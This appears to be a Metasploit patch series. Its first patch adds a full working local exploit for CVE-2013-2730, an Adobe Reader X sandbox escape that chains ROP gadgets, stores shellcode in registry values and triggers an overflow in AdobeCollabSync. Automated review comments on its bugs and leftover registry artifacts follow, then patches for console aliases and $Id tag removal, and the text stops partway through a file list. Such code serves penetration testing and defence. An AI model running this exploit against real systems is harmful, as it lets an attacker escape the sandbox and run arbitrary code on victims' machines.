From 85ceaa1a622a08b729cd8503efed1001307a4707 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sat, 18 May 2013 12:44:24 -0500
Subject: [PATCH 1/6] Add module for CVE-2013-2730
---
.../local/adobe_sandbox_adobecollabsync.rb | 364 ++++++++++++++++++
1 file changed, 364 insertions(+)
create mode 100644 modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
diff --git a/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
new file mode 100644
index 0000000000..de33098531
--- /dev/null
+++ b/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb
@@ -0,0 +1,364 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/windows/registry'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Exploit::Local
+ Rank = GreatRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Post::Windows::Registry
+
+ def initialize(info={})
+ super(update_info(info, {
+ 'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
+ 'Description' => %q{
+ This module exploits a vulnerability on Adobe Reader X Sandbox. The
+ vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
+ process to write register values which can be used to trigger a buffer overflow on
+ the AdobeCollabSync component, allowing to achieve Medium Integrity Level
+ privileges from a Low Integrity AcroRd32.exe process. This module has been tested
+ successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Felipe Andres Manzano', # Vulnerability discovery and PoC
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'CVE', '2013-2730' ],
+ [ 'OSVDB', '93355' ],
+ [ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
+ ],
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'win',
+ 'SessionTypes' => 'meterpreter',
+ 'Payload' =>
+ {
+ 'Space' => 12288,
+ 'DisableNops' => true
+ },
+ 'Targets' =>
+ [
+ [ 'Adobe Reader X 10.1.4 / Windows 7 SP1',
+ {
+ 'AdobeCollabSyncTrigger' => 0x18fa0,
+ 'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate'=> 'May 14 2013'
+ }))
+
+ end
+
+ def on_new_session
+ print_status("Deleting Malicious Registry Keys...")
+ if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
+ print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
+ end
+ if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
+ print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
+ end
+ print_status("Cleanup finished")
+ end
+
+ # Test the process integrity level by trying to create a directory on the TEMP folder
+ # Access should be granted with Medium Integrity Level
+ # Access should be denied with Low Integrity Level
+ # Usint this solution atm because I'm experiencing problems with railgun when trying
+ # use GetTokenInformation
+ def low_integrity_level?
+ tmp_dir = expand_path("%TEMP%")
+ cd(tmp_dir)
+ new_dir = "#{rand_text_alpha(5)}"
+ begin
+ session.shell_command_token("mkdir #{new_dir}")
+ rescue
+ return true
+ end
+
+ if directory?(new_dir)
+ session.shell_command_token("rmdir #{new_dir}")
+ return false
+ else
+ return true
+ end
+ end
+
+ def check_trigger
+ signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
+ if signature == target['AdobeCollabSyncTriggerSignature']
+ return true
+ end
+ return false
+ end
+
+ def collect_addresses
+ # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
+ @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
+ vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")
+
+ # find kernel32.dll
+ kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
+ @addresses['kernel32.dll'] = kernel32["return"]
+ if @addresses['kernel32.dll'] == 0
+ fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll")
+ end
+ vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")
+
+ # find kernel32.dll methods
+ virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
+ @addresses['VirtualAlloc'] = virtual_alloc["return"]
+ if @addresses['VirtualAlloc'] == 0
+ fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc")
+ end
+ vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")
+
+ reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
+ @addresses['RegGetValueA'] = reg_get_value["return"]
+ if @addresses['RegGetValueA'] == 0
+ fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA")
+ end
+ vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")
+
+ # find ntdll.dll
+ ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
+ @addresses['ntdll.dll'] = ntdll["return"]
+ if @addresses['ntdll.dll'] == 0
+ fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll")
+ end
+ vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
+ end
+
+ # Search a gadget identified by pattern on the process memory
+ def search_gadget(base, offset_start, offset_end, pattern)
+ mem = base + offset_start
+ length = offset_end - offset_start
+ mem_contents = session.railgun.memread(mem, length)
+ return mem_contents.index(pattern)
+ end
+
+ # Search for gadgets on ntdll.dll
+ def search_gadgets
+ ntdll_text_base = 0x10000
+ search_length = 0xd6000
+
+ @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
+ if @gadgets['mov [edi], ecx # ret'].nil?
+ fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
+ end
+ @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
+ @gadgets['mov [edi], ecx # ret'] += ntdll_text_base
+ vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")
+
+ @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
+ vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")
+
+ @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
+ if @gadgets['pop edi # ret'].nil?
+ fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
+ end
+ @gadgets['pop edi # ret'] += @addresses['ntdll.dll']
+ @gadgets['pop edi # ret'] += ntdll_text_base
+ vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")
+
+ @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
+ if @gadgets['pop ecx # ret'].nil?
+ fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
+ end
+ @gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
+ @gadgets['pop ecx # ret'] += ntdll_text_base
+ vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
+ end
+
+ def create_rop_chain
+ mem = 0x0c0c0c0c
+
+ buf = [0x58000000 + 1].pack("V")
+ buf << [0x58000000 + 2].pack("V")
+ buf << [0].pack("V")
+ buf << [0x58000000 + 4].pack("V")
+
+ buf << [0x58000000 + 5].pack("V")
+ buf << [0x58000000 + 6].pack("V")
+ buf << [0x58000000 + 7].pack("V")
+ buf << [@gadgets['ret']].pack("V")
+ buf << rand_text(8)
+
+ # Allocate Memory To store the shellcode and the necessary data to read the
+ # shellcode stored in the registry
+ buf << [@addresses['VirtualAlloc']].pack("V")
+ buf << [@gadgets['ret']].pack("V")
+ buf << [mem].pack("V") # lpAddress
+ buf << [0x00010000].pack("V") # SIZE_T dwSize
+ buf << [0x00003000].pack("V") # DWORD flAllocationType
+ buf << [0x00000040].pack("V") # flProtect
+
+ # Put in the allocated memory the necessary data in order to read the
+ # shellcode stored in the registry
+ # The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
+ # The reg entry: shellcode
+ # The output buffer size: 0x3000
+ reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
+ j = 0
+ while (j < reg_key.length)
+ buf << [@gadgets['pop edi # ret']].pack("V")
+ buf << [mem + j].pack("V") # edi
+ buf << [@gadgets['pop ecx # ret']].pack("V")
+ buf << reg_key[j, 4].ljust(4,"\x00") # ecx
+ buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
+ j = j + 4
+ end
+ k = j
+ value_key = "shellcode\x00"
+ j = 0
+ while (j < value_key.length)
+ buf << [@gadgets['pop edi # ret']].pack("V")
+ buf << [mem + k + j].pack("V") # edi
+ buf << [@gadgets['pop ecx # ret']].pack("V")
+ buf << value_key[j, 4].ljust(4,"\x00") # ecx
+ buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
+ j = j + 4
+ end
+
+ size_buffer = 0x3000
+ buf << [@gadgets['pop edi # ret']].pack("V")
+ buf << [mem + 0x50].pack("V") # edi
+ buf << [@gadgets['pop ecx # ret']].pack("V")
+ buf << [size_buffer].pack("V") # ecx
+ buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
+
+ # Copy the shellcode from the the registry to the
+ # memory allocated with executable permissions and
+ # ret into there
+ buf << [@addresses['RegGetValueA']].pack("V")
+ buf << [mem + 0x1000].pack("V") # ret to shellcode
+ buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER
+ buf << [mem].pack("V") # lpSubKey
+ buf << [mem + 0x3c].pack("V") # lpValue
+ buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY
+ buf << [0].pack("V") # pdwType
+ buf << [mem + 0x1000].pack("V") # pvData
+ buf << [mem + 0x50].pack("V") # pcbData
+ end
+
+ # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
+ def store_data_registry(buf)
+ vprint_status("Creating the Registry Key to store the shellcode...")
+
+ if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
+ vprint_good("Registry Key created")
+ else
+ fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
+ end
+
+ vprint_status("Storing the shellcode in the Registry...")
+
+ if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
+ vprint_good("Shellcode stored")
+ else
+ fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry")
+ end
+
+ # Create the Malicious registry entry in order to exploit....
+ vprint_status("Creating the Registry Key to trigger the Overflow...")
+ if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
+ vprint_good("Registry Key created")
+ else
+ fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
+ end
+
+ vprint_status("Storing the trigger in the Registry...")
+ if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
+ vprint_good("Trigger stored")
+ else
+ fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry")
+ end
+ end
+
+ def trigger_overflow
+ vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
+ # Create a thread in order to execute the necessary code to launch AdobeCollabSync
+ ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
+ if ret['return'] < 1
+ print_error("Unable to CreateThread")
+ return
+ end
+ hthread = ret['return']
+
+ vprint_status("Resuming the Thread...")
+ # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
+ ret = client.railgun.kernel32.ResumeThread(hthread)
+ if ret['return'] < 1
+ fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread")
+ end
+ end
+
+ def check
+ @addresses = {}
+ acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
+ @addresses['AcroRd32.exe'] = acrord32["return"]
+ if @addresses['AcroRd32.exe'] == 0
+ return Msf::Exploit::CheckCode::Unknown
+ elsif check_trigger
+ return Msf::Exploit::CheckCode::Vulnerable
+ else
+ return Msf::Exploit::CheckCode::Detected
+ end
+ end
+
+ def exploit
+ @addresses = {}
+ @gadgets = {}
+
+ print_status("Verifying we're in the correct target process...")
+ acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
+ @addresses['AcroRd32.exe'] = acrord32["return"]
+ if @addresses['AcroRd32.exe'] == 0
+ fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found")
+ end
+ vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")
+
+ print_status("Checking the AcroRd32.exe image...")
+ if not check_trigger
+ fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
+ end
+
+ print_status("Checking the Process Integrity Level...")
+ if not low_integrity_level?
+ fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
+ end
+
+ print_status("Collecting necessary addresses for exploit...")
+ collect_addresses
+
+ print_status("Searching the gadgets needed to build the ROP chain...")
+ search_gadgets
+ print_good("Gadgets collected...")
+
+ print_status("Building the ROP chain...")
+ buf = create_rop_chain
+ print_good("ROP chain ready...")
+
+ print_status("Storing the shellcode and the trigger in the Registry...")
+ store_data_registry(buf)
+
+ print_status("Executing AdobeCollabSync.exe...")
+ trigger_overflow
+ end
+end
+
From 5e65976089ee0f81064d0ce7a9e988ee5ed3e603 Mon Sep 17 00:00:00 2001
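Review bot: The last `vprint_good` in `search_gadgets` prints the address of `@gadgets['pop ecx # ret']` under the label 'pop edi # ret', so verbose output shows two different addresses for one name; the line should read `vprint_good("Gadget 'pop ecx # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")`. In `trigger_overflow` a failed `CreateThread` only calls `print_error` and returns, while every other failure in the file goes through `fail_with`, so `exploit` finishes without reporting a failure; the same method also switches from `session.railgun` to `client.railgun` for `ResumeThread`. The registry entries written by `store_data_registry` are removed only in `on_new_session`, so a run that fails after that step appears to leave `shellcode` and `bDeleteDB` under `HKCU\Software\Adobe\Adobe Synchronizer\10.0\DBRecoveryOptions` on the tested host. Removal should not depend on a session being opened, and a comment on `store_data_registry` should name those two entries as the artifacts the module leaves behind, since they are also what a defender examining the host would look for.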
From: James Lee Date: Mon, 20 May 2013 11:20:12 -0500 Subject: [PATCH 2/6] Alias 'run' to 'exploit' Allows console users to use the 'run' command for exploits as well as auxiliary and post, in the same way that 'exploit' works for all three. Saves some typing and makes it do the right thing so users don't have to remember what kind of module they're using. --- lib/msf/ui/console/command_dispatcher/exploit.rb | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/exploit.rb b/lib/msf/ui/console/command_dispatcher/exploit.rb index f2d536ac17..9c7327002b 100644 --- a/lib/msf/ui/console/command_dispatcher/exploit.rb +++ b/lib/msf/ui/console/command_dispatcher/exploit.rb @@ -33,7 +33,9 @@ class Exploit "exploit" => "Launch an exploit attempt", "rcheck" => "Reloads the module and checks if the target is vulnerable", "rexploit" => "Reloads the module and launches an exploit attempt", - "reload" => "Just reloads the module" + "reload" => "Just reloads the module", + "run" => "Alias for exploit", + "rerun" => "Alias for rexploit", }) end @@ -197,6 +199,8 @@ class Exploit end end + alias cmd_run cmd_exploit + def cmd_exploit_help print_line "Usage: exploit [options]" print_line @@ -204,6 +208,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_run_help cmd_exploit_help + # # Reloads an exploit module and checks the target to see if it's # vulnerable. @@ -227,6 +233,8 @@ class Exploit end end + alias cmd_rerun cmd_rexploit + def cmd_rexploit_help print_line "Usage: rexploit [options]" print_line @@ -234,6 +242,8 @@ class Exploit print @@exploit_opts.usage end + alias cmd_rerun_help cmd_rexploit_help + # # Picks a reasonable payload and minimally configures it # From f4498c3916cac4fb0606903660cdc104f34edee3 Mon Sep 17 00:00:00 2001 
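Review bot: `alias cmd_run_help cmd_exploit_help` makes the help for `run` print `Usage: exploit [options]`, because the aliased method hard-codes the command name in its first `print_line`; `alias cmd_rerun_help cmd_rexploit_help` has the same effect with `Usage: rexploit [options]`. If that is intended, say so above each alias, e.g. `# 'run' is an alias: its help deliberately shows the usage of 'exploit'`; otherwise the help methods need the command name passed in rather than being aliased. `alias` also binds to the method body as it exists at that line, so a later redefinition or override of `cmd_exploit` or `cmd_rexploit` would presumably not be picked up by `cmd_run` and `cmd_rerun`. The bodies of `cmd_exploit` and `cmd_rexploit` start outside these hunks, so this is based only on the visible help methods.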
From: James Lee Date: Mon, 20 May 2013 16:21:03 -0500 Subject: [PATCH 3/6] Remove $Id tags Also adds binary coding magic comment to a few files --- lib/msf/base/sessions/command_shell_options.rb | 3 --- lib/msf/base/sessions/meterpreter.rb | 1 - lib/msf/base/sessions/meterpreter_java.rb | 1 - lib/msf/base/sessions/meterpreter_options.rb | 1 - lib/msf/base/sessions/meterpreter_php.rb | 1 - lib/msf/base/sessions/meterpreter_x86_bsd.rb | 1 - lib/msf/base/sessions/meterpreter_x86_linux.rb | 1 - lib/msf/base/sessions/meterpreter_x86_win.rb | 1 - lib/msf/base/sessions/tty.rb | 1 - lib/msf/base/sessions/vncinject_options.rb | 3 --- lib/msf/base/simple/buffer.rb | 1 - lib/msf/base/simple/payload.rb | 1 - lib/msf/core/auxiliary/commandshell.rb | 1 - lib/msf/core/auxiliary/login.rb | 3 --- lib/msf/core/auxiliary/pii.rb | 3 --- lib/msf/core/auxiliary/rservices.rb | 3 --- lib/msf/core/encoded_payload.rb | 1 - lib/msf/core/exploit/browser_autopwn.rb | 1 - lib/msf/core/exploit/cmdstager.rb | 1 - lib/msf/core/exploit/cmdstager_debug_asm.rb | 1 - lib/msf/core/exploit/cmdstager_debug_write.rb | 1 - lib/msf/core/exploit/cmdstager_tftp.rb | 1 - lib/msf/core/exploit/cmdstager_vbs.rb | 1 - lib/msf/core/exploit/cmdstager_vbs_adodb.rb | 1 - lib/msf/core/exploit/dhcp.rb | 1 - lib/msf/core/exploit/egghunter.rb | 1 - lib/msf/core/exploit/exe.rb | 3 --- lib/msf/core/exploit/fmtstr.rb | 1 - lib/msf/core/exploit/ipv6.rb | 3 --- lib/msf/core/exploit/mixins.rb | 1 - lib/msf/core/exploit/mysql.rb | 3 --- lib/msf/core/exploit/omelet.rb | 1 - lib/msf/core/exploit/pdf.rb | 3 --- lib/msf/core/exploit/php_exe.rb | 3 --- lib/msf/core/exploit/riff.rb | 3 --- lib/msf/core/exploit/tcp.rb | 4 +++- lib/msf/core/exploit/telnet.rb | 3 --- lib/msf/core/exploit/tftp.rb | 1 - lib/msf/core/exploit/wbemexec.rb | 3 --- lib/msf/core/payload/generic.rb | 5 +++++ lib/msf/core/payload/windows/exec.rb | 3 --- lib/msf/core/payload/windows/loadlibrary.rb | 3 --- lib/msf/core/rpc/v10/rpc_module.rb | 3 --- 
lib/msf/ui/console/command_dispatcher/payload.rb | 1 - lib/msf/windows_error.rb | 3 --- lib/rex/elfparsey.rb | 2 -- lib/rex/elfparsey/elf.rb | 2 -- lib/rex/elfparsey/elfbase.rb | 2 -- lib/rex/elfparsey/exceptions.rb | 2 -- lib/rex/elfscan.rb | 2 -- lib/rex/elfscan/scanner.rb | 2 -- lib/rex/elfscan/search.rb | 2 -- lib/rex/exploitation/cmdstager/tftp.rb | 1 - lib/rex/exploitation/jsobfu.rb | 1 - lib/rex/image_source.rb | 2 -- lib/rex/image_source/disk.rb | 2 -- lib/rex/image_source/image_source.rb | 2 -- lib/rex/image_source/memory.rb | 2 -- lib/rex/ole.rb | 4 ---- lib/rex/ole/clsid.rb | 4 ---- lib/rex/ole/difat.rb | 4 ---- lib/rex/ole/directory.rb | 4 ---- lib/rex/ole/direntry.rb | 4 ---- lib/rex/ole/fat.rb | 4 ---- lib/rex/ole/header.rb | 4 ---- lib/rex/ole/minifat.rb | 4 ---- lib/rex/ole/propset.rb | 4 ---- lib/rex/ole/storage.rb | 4 ---- lib/rex/ole/stream.rb | 4 ---- lib/rex/ole/substorage.rb | 4 ---- lib/rex/ole/util.rb | 4 ---- lib/rex/peparsey.rb | 2 -- lib/rex/peparsey/exceptions.rb | 2 -- lib/rex/peparsey/pe.rb | 2 -- lib/rex/peparsey/pe_memdump.rb | 2 -- lib/rex/peparsey/pebase.rb | 2 -- lib/rex/peparsey/section.rb | 2 -- lib/rex/pescan.rb | 2 -- lib/rex/proto/dhcp.rb | 1 - lib/rex/proto/dhcp/constants.rb | 1 - lib/rex/proto/dhcp/server.rb | 1 - lib/rex/proto/ntlm/crypt.rb | 4 ---- lib/rex/proto/ntlm/message.rb | 3 --- lib/rex/proto/rfb.rb | 1 - lib/rex/proto/rfb.rb.ut.rb | 2 -- lib/rex/proto/rfb/cipher.rb | 3 --- lib/rex/proto/rfb/client.rb | 3 --- lib/rex/proto/rfb/constants.rb | 3 --- lib/rex/proto/tftp.rb | 1 - lib/rex/proto/tftp/constants.rb | 1 - lib/rex/proto/tftp/server.rb | 1 - lib/rex/proto/tftp/server.rb.ut.rb | 5 ----- lib/rex/zip/archive.rb | 3 --- lib/rex/zip/blocks.rb | 3 --- lib/rex/zip/entry.rb | 3 --- modules/auxiliary/server/capture/drda.rb | 4 +--- modules/exploits/freebsd/telnet/telnet_encrypt_keyid.rb | 4 +--- modules/exploits/linux/telnet/telnet_encrypt_keyid.rb | 4 +--- .../exploits/multi/http/jboss_deploymentfilerepository.rb | 4 
+--- .../windows/browser/novelliprint_getdriversettings.rb | 4 +--- .../exploits/windows/misc/citrix_streamprocess_data_msg.rb | 4 +--- modules/post/windows/gather/credentials/imvu.rb | 4 +--- modules/post/windows/gather/credentials/outlook.rb | 2 +- modules/post/windows/recon/resolve_ip.rb | 4 +--- 104 files changed, 17 insertions(+), 232 deletions(-) diff --git a/lib/msf/base/sessions/command_shell_options.rb b/lib/msf/base/sessions/command_shell_options.rb index 028ce427ab..a170e6f4f5 100644 --- a/lib/msf/base/sessions/command_shell_options.rb +++ b/lib/msf/base/sessions/command_shell_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # This file is part of the Metasploit Framework and may be subject to diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 2f8b79580a..84b827933d 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' require 'msf/base/sessions/scriptable' diff --git a/lib/msf/base/sessions/meterpreter_java.rb b/lib/msf/base/sessions/meterpreter_java.rb index c92e58e782..2c393c31fd 100644 --- a/lib/msf/base/sessions/meterpreter_java.rb +++ b/lib/msf/base/sessions/meterpreter_java.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_options.rb b/lib/msf/base/sessions/meterpreter_options.rb index c44b8c6f5e..16942f0270 100644 --- a/lib/msf/base/sessions/meterpreter_options.rb +++ b/lib/msf/base/sessions/meterpreter_options.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'shellwords' diff --git a/lib/msf/base/sessions/meterpreter_php.rb b/lib/msf/base/sessions/meterpreter_php.rb index 2ba47c2c03..98e564567b 100644 --- a/lib/msf/base/sessions/meterpreter_php.rb +++ b/lib/msf/base/sessions/meterpreter_php.rb 
@@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_bsd.rb b/lib/msf/base/sessions/meterpreter_x86_bsd.rb index 1f851e270c..d6fb7b27d8 100644 --- a/lib/msf/base/sessions/meterpreter_x86_bsd.rb +++ b/lib/msf/base/sessions/meterpreter_x86_bsd.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_linux.rb b/lib/msf/base/sessions/meterpreter_x86_linux.rb index 33e72d1be9..45ba0b910a 100644 --- a/lib/msf/base/sessions/meterpreter_x86_linux.rb +++ b/lib/msf/base/sessions/meterpreter_x86_linux.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' diff --git a/lib/msf/base/sessions/meterpreter_x86_win.rb b/lib/msf/base/sessions/meterpreter_x86_win.rb index 2f44f0e640..c3ec8ee2cc 100644 --- a/lib/msf/base/sessions/meterpreter_x86_win.rb +++ b/lib/msf/base/sessions/meterpreter_x86_win.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/meterpreter' require 'msf/windows_error' diff --git a/lib/msf/base/sessions/tty.rb b/lib/msf/base/sessions/tty.rb index acaad4629d..400deedc56 100644 --- a/lib/msf/base/sessions/tty.rb +++ b/lib/msf/base/sessions/tty.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/base/sessions/vncinject_options.rb b/lib/msf/base/sessions/vncinject_options.rb index 1ae2954ceb..80d4930abe 100644 --- a/lib/msf/base/sessions/vncinject_options.rb +++ b/lib/msf/base/sessions/vncinject_options.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf module Sessions diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index 3e2b0aff30..7b31207d63 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' 
diff --git a/lib/msf/base/simple/payload.rb b/lib/msf/base/simple/payload.rb index 59357b1255..7415993b76 100644 --- a/lib/msf/base/simple/payload.rb +++ b/lib/msf/base/simple/payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base' diff --git a/lib/msf/core/auxiliary/commandshell.rb b/lib/msf/core/auxiliary/commandshell.rb index ae145c81be..72963b59af 100644 --- a/lib/msf/core/auxiliary/commandshell.rb +++ b/lib/msf/core/auxiliary/commandshell.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/base/sessions/command_shell_options' diff --git a/lib/msf/core/auxiliary/login.rb b/lib/msf/core/auxiliary/login.rb index 3072a44907..88012bca00 100644 --- a/lib/msf/core/auxiliary/login.rb +++ b/lib/msf/core/auxiliary/login.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## module Msf diff --git a/lib/msf/core/auxiliary/pii.rb b/lib/msf/core/auxiliary/pii.rb index 3630f08835..9f50b9d17f 100644 --- a/lib/msf/core/auxiliary/pii.rb +++ b/lib/msf/core/auxiliary/pii.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -### -# $Id$ -### module Msf diff --git a/lib/msf/core/auxiliary/rservices.rb b/lib/msf/core/auxiliary/rservices.rb index 25671464df..737b3415c6 100644 --- a/lib/msf/core/auxiliary/rservices.rb +++ b/lib/msf/core/auxiliary/rservices.rb @@ -1,7 +1,4 @@ # -*- coding: binary -*- -## -# $Id$ -## ## # diff --git a/lib/msf/core/encoded_payload.rb b/lib/msf/core/encoded_payload.rb index 2cdf6a66a1..afccaab26d 100755 --- a/lib/msf/core/encoded_payload.rb +++ b/lib/msf/core/encoded_payload.rb @@ -1,5 +1,4 @@ # -*- coding: binary -*- -# $Id$ require 'msf/core' diff --git a/lib/msf/core/exploit/browser_autopwn.rb b/lib/msf/core/exploit/browser_autopwn.rb index f4b63f8251..1ee518d714 100644 --- a/lib/msf/core/exploit/browser_autopwn.rb +++ b/lib/msf/core/exploit/browser_autopwn.rb 
